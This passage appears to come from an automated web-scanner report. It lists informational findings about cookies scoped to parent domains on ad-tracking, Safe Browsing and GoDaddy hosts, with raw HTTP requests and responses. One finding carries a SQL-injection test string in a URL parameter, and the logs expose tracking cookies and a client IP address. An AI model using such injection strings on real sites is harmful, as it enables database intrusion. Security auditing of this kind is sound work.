Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d5af335-78cce-d894f-1b47b; d=EAYAEc45slG6iR6aEAG5AQGuBoFw9ZrRxs_BU5Tl4eooIAmxocdN95YMUCDVDlAPtbTRAg7Cot4ZIxAhCRAAQQKdLEltSiofJ0EyXCTSUDLLKEAYWxL0soVQyheXoS0wDakg0uObHS-R4tVgAA

Response

HTTP/1.1 302 Found
Connection: close
Location: https://www.googleadservices.com/pagead/conversion/1028406127/?label=DP44CM-K9gEQ7_aw6gM&amp;guid=ON&amp;script=0
Set-Cookie: d=EMsAEc45slG6iR6aEAG7AQGuBoFw9ZrRxs_BU5Tl4eooIOGbE8dN95YMUCDVDlAPtbTRAg7Cot4ZIxAhCRAAQQKdLEltSiofJ0EyXCTSUDLLKEAYWxL0soVQyheXoS0wDakg0uObHS-R4tXCDRA; expires=Fri, 24-Jun-2011 20:36:22 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sat, 26 Mar 2011 20:36:22 GMT
Server: QS

14.18. http://pixel.quantserve.com/pixel/p-5aWVS_roA1dVM.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-5aWVS_roA1dVM.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-5aWVS_roA1dVM.gif?labels=19677.16 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d5af335-78cce-d894f-1b47b; d=EBgAEc45slG6iR6aEAG3AQGuBoFw9ZrRxs_BU5Tl4eooIAmxoa-B1QxQINUOUA-1tNECDsKi3hkjECEJEABBAp0sSW1KKh8nQTJcJNJQMssoQBhbEvSyhVDKF5ehLTANqSDS45sdL5Hi1WAA

Response

HTTP/1.1 302 Found
Connection: close
Location: http://segment-pixel.invitemedia.com/pixel?pixelID=18407&partnerID=41&clientID=1545&key=segment&pb=0
Set-Cookie: d=EHYAEc45slG6iR6aEAG5AQGuBoFw9ZrRxs_BU5Tl4eooIOGbE8dN95YMUCDVDlAPtbTRAg7Cot4ZIxAhCRAAQQKdLEltSiofJ0EyXCTSUDLLKEAYWxL0soVQyheXoS0wDakg0uObHS-R4tVgAA; expires=Fri, 24-Jun-2011 20:36:19 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sat, 26 Mar 2011 20:36:19 GMT
Server: QS

14.19. http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /seg/p-6fTutip1SMLM2.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /seg/p-6fTutip1SMLM2.js HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d5af335-78cce-d894f-1b47b; d=EBMAEc45slG6iR6aEAG5AQGsBoEw9ZrRxs_BU5Tl4eooIAmxoa-B1QxQINUOUA-1tNECDsKi3hkjECEJEABBAswuNGltSiofJ0EyXCTSUDLLKEAYWxL0soVQyheXoS0wDakg0uObHS-R4tVgAA
If-None-Match: "S19506:E0-184653678-1300987722635"

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EFEAEc45slG6iR6aEAG5AQGuBoFw9ZrRxs_BU5Tl4eooIAmxoa-B1QxQINUOUA-1tNECDsKi3hkjECEJEABBAswuNGltSiofJ0EyXCTSUDLLKEAYWxL0soVQyheXoS0wDakg0uObHS-R4tVgAA; expires=Fri, 24-Jun-2011 20:36:03 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Content-Type: application/x-javascript
ETag: "S19556:E0-184653678-1300987722635"
Cache-Control: private, no-transform, max-age=600
Expires: Sat, 26 Mar 2011 20:46:03 GMT
Content-Length: 538
Date: Sat, 26 Mar 2011 20:36:03 GMT
Server: QS

function _qcdomain2(){
var d=document.domain;
if(d.substring(0,4)=="www.")d=d.substring(4,d.length);
var a=d.split(".");var len=a.length;
if(len<3)return d;
var e=a[len-1];
if(e.length<3)return
...[SNIP]...
14.20. http://safebrowsing.clients.google.com/safebrowsing/downloads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/downloads

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /safebrowsing/downloads?client=googlechrome&appver=10.0.648.151&pver=2.2&wrkey=AKEgNiu2mFE63FMw496NljDbfuqWVUHfR5aspR9G78SPoDGBnjDblFO5_v3By_lHgdefi2qYWL0qQkqRPEgqQcEZbPgzqr3RaA== HTTP/1.1
Host: safebrowsing.clients.google.com
Proxy-Connection: keep-alive
Content-Length: 104
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=45=hECaSPNKbGmHQVaeX8QfVjYPb7irgBJrevtV-Ucf8CbbaGBgB7E0-GXnJT1n8t0Kfgh9itDw1n5QPZyWBCgiZYImFLvylkVRtN68wV37kiG2NOQgw1cJtXY_RuWuwwF_; PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301077647:GM=1:IG=3:SG=1:S=9UvUxDIbgGP9-w2y

goog-malware-shavar;a:27774-34663:s:40463-47213:mac
goog-phish-shavar;a:130083-134182:s:66939-68568:mac

Response

HTTP/1.1 200 OK
Content-Type: application/vnd.google.safebrowsing-update
Set-Cookie: PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301081993:GM=1:IG=3:SG=1:S=P4ZuZeeHinwF7KvI; expires=Sun, 24-Mar-2013 19:39:53 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 19:39:53 GMT
Server: Chunked Update Server
Content-Length: 887
X-XSS-Protection: 1; mode=block
Expires: Fri, 25 Mar 2011 19:39:53 GMT
Cache-Control: private

m:Ejn9-Y_3c7-WAcrCJu03BXXpV-Y=
n:1828
i:goog-malware-shavar
u:safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY6_ACIPTwAioFcrgAAAcyBWu4AAB_,89mcjPvVLz1ZpWa7L6xaKzwV65E=
u:
...[SNIP]...
14.21. http://safebrowsing.clients.google.com/safebrowsing/gethash  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/gethash

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /safebrowsing/gethash?client=googlechrome&appver=10.0.648.151&pver=2.2&wrkey=AKEgNiu2mFE63FMw496NljDbfuqWVUHfR5aspR9G78SPoDGBnjDblFO5_v3By_lHgdefi2qYWL0qQkqRPEgqQcEZbPgzqr3RaA== HTTP/1.1
Host: safebrowsing.clients.google.com
Proxy-Connection: keep-alive
Content-Length: 8
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=45=hECaSPNKbGmHQVaeX8QfVjYPb7irgBJrevtV-Ucf8CbbaGBgB7E0-GXnJT1n8t0Kfgh9itDw1n5QPZyWBCgiZYImFLvylkVRtN68wV37kiG2NOQgw1cJtXY_RuWuwwF_; PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301139890:GM=1:IG=3:SG=1:S=O0gQ5y7hhNKL77Jw

4:4
...

Response

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Set-Cookie: PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301140305:GM=1:IG=3:SG=1:S=HueoMC6XtnV6npfN; expires=Mon, 25-Mar-2013 11:51:45 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Sat, 26 Mar 2011 11:51:45 GMT
Server: Hash Suffix Server
Content-Length: 90
X-XSS-Protection: 1; mode=block
Expires: Sat, 26 Mar 2011 11:51:45 GMT
Cache-Control: private

ibCeOfOv4k41gkiZGXS-JFghqA0=
goog-malware-shavar:32199:32
... .&...I..7 8xT.ESz.z....vD..
14.22. http://tacoda.at.atwola.com/rtx/r.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rtx/r.js?cmd=MUS&si=16768&pi=L&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//music.aol.com/radioguide/bb%2526cmmiss%253D-1%2526cmkw%253D&r=&df=1&v=5.5&cb=94859 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D69B03E6E651A440C6EAF39F001EBEA; ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ANRTT=61225^1^1301330893|60183^1^1301587729|50216^1^1301436289|61166^1^1301592818; TData=99999|^|61674|60489|60740|60490|56262|61576|60493|50963|60491|60515|60514|52614|53656|52842|56830|52615|60546|56918|60500|56920|56555|51133|56988|56917|53435|54173|56500|52611|54463|56969|56835|54938|61166|56761|56780; N=2:ef750afea1932931347519ba153fff1c,a07761c4014e52e7e1bc39b6a051a868; ATTAC=a3ZzZWc9OTk5OTk6NjE2NzQ6NjA0ODk6NjA3NDA6NjA0OTA6NTYyNjI6NjE1NzY6NjA0OTM6NTA5NjM6NjA0OTE6NjA1MTU6NjA1MTQ6NTI2MTQ6NTM2NTY6NTI4NDI6NTY4MzA6NTI2MTU6NjA1NDY6NTY5MTg6NjA1MDA6NTY5MjA6NTY1NTU6NTExMzM6NTY5ODg6NTY5MTc6NTM0MzU6NTQxNzM6NTY1MDA6NTI2MTE6NTQ0NjM6NTY5Njk=; eadx=2

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:34 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sat, 26 Mar 2011 20:51:34 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; path=/; expires=Tue, 20-Mar-12 20:36:34 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=61225^1^1301330893|60183^1^1301587729|50216^1^1301436289|61166^1^1301592818|50215^1^1301776594; path=/; expires=Sat, 02-Apr-11 20:36:34 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1301171786^1301173594|16768^1301171786^1301173594; path=/; expires=Sat, 26-Mar-11 21:06:34 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|60739|60489|60740|60490|56262|56511|60493|50963|60491|60515|60514|52614|53656|52842|56830|55401|52615|60546|56918|60500|56920|56555|56761|56500|56988|52611|53603|54173|53435|54463|56917|56969|56718|56835|56715; expires=Tue, 20-Mar-12 20:36:34 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:0cd73208ac57a723a07d874a21de8895,7a83820d0a0dd8c854eabe6c04f3aee3; expires=Tue, 20-Mar-12 20:36:34 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NjA3Mzk6NjA0ODk6NjA3NDA6NjA0OTA6NTYyNjI6NTY1MTE6NjA0OTM6NTA5NjM6NjA0OTE6NjA1MTU6NjA1MTQ6NTI2MTQ6NTM2NTY6NTI4NDI6NTY4MzA6NTU0MDE6NTI2MTU6NjA1NDY6NTY5MTg6NjA1MDA6NTY5MjA6NTY1NTU6NTY3NjE6NTY1MDA6NTY5ODg6NTI2MTE6NTM2MDM6NTQxNzM6NTM0MzU6NTQ0NjM=; expires=Tue, 20-Mar-12 20:36:34 GMT; path=/; domain=.at.atwola.com
Set-Cookie: eadx=x; path=/; expires=Tue, 29-Mar-11 20:36:34 GMT; domain=tacoda.at.atwola.com
ntCoent-Length: 321
Content-Type: application/x-javascript
Content-Length: 321

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16lsqii1n1a3cr';
var ANSL='99999|^|60739|60489|60740|60490|56262|56511|60493|50963|60491|60515|60514|52614|53656|52842|56830|55401|52615|60546|56918|
...[SNIP]...
14.23. http://tags.bluekai.com/site/3200  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3200

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3200 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99W4pVANemJaB; bko=KJ0ETt5Qi9pF2ZPADmKaLVjy1pOGQaZEtOQRdr2FXmPiu9Evzrho9/o8yNkSw9y1t47PFAy1YUYVJOIWhzRQYtPh1vQY54OFpxuSzQ4/T7EwXsPk99YlVCK2; bkw5=KJhNAM+n9NWxCz2rBJ+5W06NX5WoWoYxWcWETtb1s1x0MSHV6y7SvPQJxHsYkxoVPFbYRYZR0+nvHkYy6LolAaEm4jCfQbES0lhpjLf1f1DAQBQ0cw31TuWOsnY53N1QsvKx/XQG7MHiJjMs8SxwXtka3Axv5QAlHv/TTbHkkbF5um6mKWNuYWPXsDYWwRZzOcT0yWWvYW707PJj9ItLDOSGDul/0iwyUac8F9kzEomY0vlaRk8sAmcOq3uX9T0fpv4nIhMR7QP1bFBssSvqTOZBdfZNLL/CXhsEeol/lGuOKaq1yziD2k8kYk7nxL/U+5TgynosKosD8/w/Oi4Y7TZYgdSy3VkLkYU8J1tVoQkQHH/t6bbZYVnJP2mRm4/jarxbolq4lfcfCASzBZW2fI4DfKvKtA06Fj7MiGssJdbvxhwGx5N71fPL78nWOKFzDPa32Jlr8TcvD9kgwwSzah5A0Af0GosjC4dPZrsM+/ccHU/qv7slFpS05pT=; bkst=KJhMR5Mehx9WMfmf4PAR2Qwj/QpKcgGsDsO3RZkrqsoCSzk2G9WG4yQGgXJQAsvSSZCiZSvqjJHGGs+iRsZQZtH3kvogjQkuq8vz7s3zpmx11ZXoBymeB/mpGtry3b+aVoZc56Hy+ZIuDfhlGP2PPGiHKE3wKyjxsuXw9T1yQTZJrRsJ3SZorqsH3Ecxvs1EQIFZqDOomPTsOCTs28pAMYn4JW5elIYQDpv5xwsUFYeUZOZ7siVqZNFGoCZ7sr3SoOQRbP3AoCgosoAjo3xkZokRZOi7kOrPI9/9ji9lBx==; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101qSofdRa9WR7O5T=; bk=MnD5YhZZUJJh4f95; bkc=KJh5NP+LPaDDOrONog5ooXH3Fm9aPc3GFBYcAxCanjYSsOFshYQvhMutxBPD/YHPbDDfxvaNna8iDWOM4sQ4EYwaBYUH/rJGxCxEUyyX/HVY3m7WVAi2Jvnd4p3gL25Imj1FI44SKbdjI8hL/eJ0i6M4prtoZWh+pzvcwE2PUwYHYosEUToLUJrO36FGx8fFYv68UotraakTK095wSIkirHmGEK2n1q132Iwi4pVvU/4MvPWd3fVIoH7Mkz4ydpaVjWnqxUlnqJZUFNwrzic10/q7iCTlt7goQfgej8UlPpyxE03Lq2shy5F+efQZK+o5m325e3xJUO182LMhQtKctr0qgpJIkqwkl3LHpjqzpl3nwoPiUfssZqUH2z7gJkUn8y7L78h/O1qVNnaL70/73yHRIqPs5uSvQrA+fDgPugFN5sdKtjKwRp8HA5aEZOXUOTjomd5RXtXrCyId38/Nzd264gGEqr+Nbu+ISrmGhXdG78rw/NI7ntBlFZi55Gp8N5wRFtE8Razl2DU2jBZdNypgXfOmKxdbm0n8LdkXbbjPXdedqkSazij8UF7dsKoB4w3pUQ1UuFu7ZhcdXIFoxz21b2IwrdrL58Gdn2k/Zsg0BcHQ3L21bdI9F6LhdkJ7WMwI5rkNL0g8IBXd/OnWEdsdkPad3PaMcLXwpe4Zr455qeRNCww7aX2Qw8KhFZqco25epl+ZUANMgqDTfb4fmMYIIrdsIMcvbpUKKjT5xnpCXk9MCfFMrgH5qVO7wrXsILoiMyHV328PRhjEdNvUvHAuu9nS+FCdo9ILAt1elFZKeUgnDgmpL4Njc9GfX4IogOK5UvoB447ZFUDqUMAgL155epoZUkNOKq4lho/tfSY52DWzCzzyXtApTUVf/5gNkmwTp8IM45NyFaU73wp8Ty4rcrtwr44URG2wR72qYlTTRHN+BIXOleIabO4EbKloXGAV6mFqgJK8j7MNKXDiUurhJN8XBkDixyIH1z2E2PjUdEXNMlVqlgZ4vTFTd8K1dRzpZmZQjftd/47FIGvdQMFkpuIfhBU5bOdbywbnnT7g3wl45TMXafAp65IBenpgokUeXmfAwXqj7IcXl7UpvLdQ4rHFIYRK54H2pdFMIaK8n2lpnhg8+PMX9e0gp+ZlMUpbk2h7+RBO4JYLMNbF2m4jLuRK4DVeYgY2IMuE0NyzdtVdwNxeIcLgRycDG7dMdUoajbjPX5x4yqljlP5X80FKeTEVF1IrVR22xptBf1dABehsXrLETUVgmKS25HUT1EqQU0tGr9vpdrVVUXEVgmIS2jUPtc2OpeIZSoZ7Bz5AuIsNCpFZrwPdymh06LT

Response

HTTP/1.0 200 OK
Date: Sat, 26 Mar 2011 20:36:20 GMT
Set-Cookie: bklc=4d8e4e44; expires=Mon, 28-Mar-2011 20:36:20 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=/yCSYOZZUJJh4f95; expires=Thu, 22-Sep-2011 20:36:20 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5Nk+LPaDDOrONog5ooXEHK1WnSmiCXA/4Hi/1SGcDhBQyJAjH1vShOS3Z9isouidS9x3++UiJxDs1XSa21/6D68HWiTMPCYQZFCCTxiGWD5mJ+jY3Jvnd4p3gL25IZKjndgltw3+g78kLozMYmyBoblG2D0hUWNkT60+idcHhyKmO0wO+/M6f+t5i1gVPwr0jK4VHYosEUTkLUBLcP8UxflrIvfEZKFDc1jc4t6UrhdTGn4ElB5S7wcm2ICM3aRInUsQorsKHB4w33IDicXt/qci0Tct7gHFSge5TU7Pgyx4hDRPINMLIKnwN9zXXEfNEfIUEQu0ORfg4cMsrXdhTQlU2n5SlKffDjEtXtjg7DRIMU8UGjbhr27h6qzvSK4UYKungayz0LqWJXfBXAJbLaZwZNUtGBPDVuc5pHbjDe3UowpypghfY4i1M/iKywibwe+elfqaZUk6mcl2wJwknqlxIK+BrbpPjSd8Ph2sw7N9dB8jawXfKxK2X0EggZ4rgJlcI04J9qrpGi4oJLlIrZP47TOp0cfqlHwF7X77UpvF7Tq8Kuyj0jF7Km42PSLtXKM1IO3XUSDtNGFd7N2/e7okUF8Ol8tCl+wf41osyVKEGu1aP7okU4TkIkZBIWiK0zd8r3EUpbFZRMh2hvKnctn2A8aIqhnMnXTwpgE7FgGwa+o8T8Ff34FEl1rjFKZptwwu6jIqPsstohU6dt5SHvjndq3v43nOK887gNx7LcbRYmU3X1bocotLYm45aJX8EacAi+afpZCip7FgPrWMJAA9VNnEYFua2jJLRcdq12VgVV8uSlRd7bzBxwGe7ZXJ8NSZkN7yINb07qLacfQqzxzKE7okUPteddztO+sygKa5N/c4e15h1IkhGpUbTjMlNsmfMBlC4JhhdfEZSwt52dptp2q7dfk/X6NBT736aw8vyMoTlflf1dyn6b87L2A0jMa4E3hrLPl7ZKFVfHun+vla7c7GrD0/ee2BhpNBobTrKlffUIilwl1dNj5p4b6S4hpptN5cE7Fd6dcKbT/dh4L7i2XEW+HlGld39wGFFW24HIpfFRUQFXrzMwhSjK5413T4QUzMd9fmdxdZXSIqP7Xv20a2ypnpgbwLdf6dQqrHdz10XSIqPGl9dXZXTj+TNXIg41WdgOQB815DSF5dopdgWZc7Naiy3yF4HojIqT1qSn47fGHfWfvt1ONvJdhdg60LX1bImG4T1fLd35mmzglQIWNgpwgkZw4D17Z2Z40YCTpKUVjXvgP7wBKrogXYJ5yn84WUOajflnqwIBgHZ45KLg6fid9Kyd+kA/IjNHIunGEUUrIjb242w1Dl7; expires=Thu, 22-Sep-2011 20:36:20 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sun, 27-Mar-2011 20:36:20 GMT; path=/; domain=.bluekai.com
BK-Server: 8d9f
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
14.24. http://tracker.marinsm.com/tp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracker.marinsm.com
Path:   /tp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tp?act=1&cid=zbygse58m0&tz=5&ref=&page=http%3A%2F%2Fwww.insideup.com%2Fppc%2Fleadflow%2Fhins00%2Fleadflow%2Fhins00%2Fproject.php%3FcatId%3D'%2BOR%2B'ns'%253d'ns%26iusrc%3D3&uuid=0291FF4C-46CC-491C-85AD-35386C724DCE&rnd=1600410261 HTTP/1.1
Host: tracker.marinsm.com
Proxy-Connection: keep-alive
Referer: http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid=0291FF4C-46CC-491C-85AD-35386C724DCE

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181417)/JBossWeb-2.0
P3P: CP="NOI DSP COR NID CUR ADM DEV OUR BUS"
Pragma: no-cache
Cache-Control: private, no-cache
Content-Type: image/gif
Content-Length: 35
Date: Fri, 25 Mar 2011 19:15:59 GMT
Connection: close
Set-Cookie: _msuuid=0291FF4C-46CC-491C-85AD-35386C724DCE; Domain=marinsm.com; Expires=Sat, 24-Mar-2012 19:15:59 GMT; Path=/

GIF89a.............,...........D..;
14.25. https://www.godaddy.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?isc=GPASH002 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH002%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH002&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
Set-Cookie: HPBackground=DanicaImageTwo; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:21 GMT
Content-Length: 250092


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
14.26. https://www.godaddy.com/Hosting/web-hosting.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /Hosting/web-hosting.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Hosting/web-hosting.aspx?ci=13891&isc=gpash016 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
